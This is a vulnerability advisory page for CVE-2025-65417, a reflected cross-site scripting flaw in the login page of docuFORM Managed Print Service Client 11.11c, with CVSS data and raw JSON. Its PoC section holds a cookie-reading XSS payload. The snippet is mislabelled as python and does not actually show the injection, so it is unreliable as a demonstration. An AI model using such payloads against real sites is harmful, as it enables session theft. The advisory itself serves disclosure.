Security Vulnerability Report
中文
CVE-2025-65417 CVSS 6.1 MEDIUM

CVE-2025-65417

Published: 2026-05-11 16:17:29
Last Modified: 2026-05-12 15:05:31

Description

docuFORM Managed Print Service Client 11.11c is vulnerable to a reflected cross site scripting attack via the login page of the application.

CVSS Details

CVSS Score
6.1
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

docuFORM Managed Print Service Client 11.11c

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- PoC for Reflected XSS --> <!-- Usage: Append payload to the vulnerable login parameter --> <script> // Malicious payload to be injected var payload = '"><script>alert(document.cookie)</script>'; // Simulating the attack vector console.log('Injecting payload: ' + payload); // If vulnerable, the browser executes: alert(document.cookie); </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-65417", "sourceIdentifier": "[email protected]", "published": "2026-05-11T16:17:29.160", "lastModified": "2026-05-12T15:05:31.120", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "docuFORM Managed Print Service Client 11.11c is vulnerable to a reflected cross site scripting attack via the login page of the application."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://ZeroBreach.de", "source": "[email protected]"}, {"url": "https://gist.github.com/ZeroBreach-GmbH/906ec04806f62d61c65b1c90b0f36c4a", "source": "[email protected]"}, {"url": "https://www.docuform.de/", "source": "[email protected]"}]}}